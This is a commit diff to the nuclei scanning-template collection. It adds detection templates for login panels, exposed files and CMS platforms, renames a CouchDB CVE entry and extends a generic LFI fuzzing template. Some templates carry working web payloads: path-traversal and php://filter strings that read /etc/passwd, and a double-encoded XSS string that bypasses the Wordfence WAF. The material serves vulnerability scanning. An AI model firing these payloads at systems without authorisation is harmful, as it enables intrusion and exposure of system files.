Noam Rathaus 2021-04-20 18:41:10 +03:00
commit e9a13c2018
18 changed files with 111604 additions and 57750 deletions

View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 282 | vulnerabilities | 127 | exposed-panels | 118 |
| takeovers | 67 | exposures | 74 | technologies | 61 |
| cves | 282 | vulnerabilities | 128 | exposed-panels | 120 |
| takeovers | 67 | exposures | 78 | technologies | 63 |
| misconfiguration | 55 | workflows | 30 | miscellaneous | 20 |
| default-logins | 22 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 7 | helpers | 6 | iot | 11 |
| fuzzing | 8 | helpers | 7 | iot | 11 |
**99 directories, 964 files**.
**99 directories, 975 files**.
</td>
</tr>

View File

@ -1,12 +1,12 @@
id: CVE-2017-12635
info:
name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 RCE
name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation
author: pikpikcu
severity: high
description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
reference: https://github.com/assalielmehdi/CVE-2017-12635
tags: cve,cve2017,couchdb,rce
tags: cve,cve2017,couchdb
requests:
- raw:

View File

@ -0,0 +1,24 @@
id: polycom-login
info:
name: Polycom Login
author: DhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/6863
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Polycom Login</title>"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: sauter-login
info:
name: Sauter moduWeb - Login
author: DhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/6883
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/?locale=en"
matchers-condition: and
matchers:
- type: word
words:
- <title>Sauter moduWeb - Login</title>
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: exposed-authentication.asmx
info:
name: Exposed Authentication.asmx
author: DhiyaneshDk
severity: low
reference: https://www.exploit-db.com/ghdb/6604
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/_vti_bin/Authentication.asmx?op=Mode"
matchers-condition: and
matchers:
- type: word
words:
- "Authentication Web Service"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: kyan-network-credential-exposure
info:
name: Kyan network monitoring device account and password exposure
author: pikpikcu
severity: medium
reference: |
- https://mp.weixin.qq.com/s/6phWjDrGG0pCpGuCdLusIg
tags: kyan,exposure,config
requests:
- method: GET
path:
- "{{BaseURL}}/hosts"
matchers-condition: and
matchers:
- type: word
words:
- "UserName="
- "Password="
condition: and
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: saia-web-server
info:
name: Saia PCD Web-Server
author: DhiyaneshDk
severity: low
reference: https://www.exploit-db.com/ghdb/6865
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/loadtextfile.htm#programinfo"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Saia PCD Web Server</title>"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: phpunit
info:
name: phpunit.xml file disclosure
author: pikpikcu
severity: info
tags: file,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/phpunit.xml"
matchers-condition: and
matchers:
- type: word
words:
- "<phpunit"
- "</phpunit>"
condition: and
- type: status
status:
- 200

View File

@ -1,7 +1,7 @@
id: generic-lfi-fuzzing
info:
name: Generic LFI Test
author: geeknik
author: geeknik & unstabl3
severity: high
description: A generic test for Local File Inclusion
tags: fuzz,lfi
@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd"
- "{{BaseURL}}/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd"
- "{{BaseURL}}/etc/passwd"
matchers:
- type: regex
words:

View File

@ -0,0 +1,30 @@
id: wordpress-plugins-detect
info:
name: WordPress Plugins Detection
author: 0xcrypto
severity: info
tags: fuzz
requests:
- payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
attack: sniper
threads: 50
raw:
- |
GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "== Description =="

View File

@ -0,0 +1,30 @@
id: wordpress-themes-detect
info:
name: WordPress Theme Detection
author: 0xcrypto
severity: info
tags: fuzz
requests:
- payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
attack: sniper
threads: 50
raw:
- |
GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "== Description =="

View File

@ -1,34 +0,0 @@
id: wp-plugin-scan
info:
name: Wordpress Plugin Scanner
author: pdteam
severity: info
description: Wordlist based wordpress plugin scanner.
reference: https://github.com/RandomRobbieBF/wordpress-plugin-list
tags: fuzz
requests:
- payloads:
plugin_wordlist: helpers/wordlists/wp-plugins.txt
attack: sniper
threads: 50
raw:
- |
GET {{plugin_wordlist}} HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "== Description =="

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,31 @@
id: mautic-crm-detect
info:
name: mautic crm detect
author: cyllective
severity: info
description: Detects Mautic CRM
tags: tech,mautic,crm
references:
- https://github.com/mautic/mautic
requests:
- method: GET
path:
- "{{BaseURL}}/s/login"
matcherscondition: or
matchers:
- type: word
part: body
condition: or
words:
- '<title>Mautic</title>'
- '<div class="mautic-logo'
- type: regex
part: body
condition: or
regex:
- 'var\s+?mautic(?:BasePath|BaseUrl|AjaxUrl|AjaxCsrf|AssetPrefix|Content|Env|Lang)\s+?='
- 'Copyright \d{4} Mautic\. All Rights Reserved\.'

View File

@ -0,0 +1,26 @@
id: plone-cms-detect
info:
name: Plone CMS detect
author: cyllective
severity: info
description: Detects Plone CMS
tags: tech,plone,cms
references:
- https://github.com/plone/Products.CMFPlone
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
condition: or
words:
- '<meta name="generator" content="Plone - '
- '<div xmlns:css="http://namespaces.plone.org/diazo/css"'
- '/++plone++static/plone-compiled.css'
- '/++plone++static/tinymce-styles.css'
- '>Powered by Plone &amp; Python</a>'

View File

@ -0,0 +1,29 @@
id: wordpress-wordfence-waf-bypass-xss
info:
author: hackergautam
name: Wordfence WAF Bypass WordPress XSS
reference: https://twitter.com/naglinagli/status/1382082473744564226
severity: medium
tags: wordpress,wordfence,xss
requests:
- method: GET
path:
- "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6"
matchers-condition: and
matchers:
- type: word
words:
- <script>alert(document.domain)</script>
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200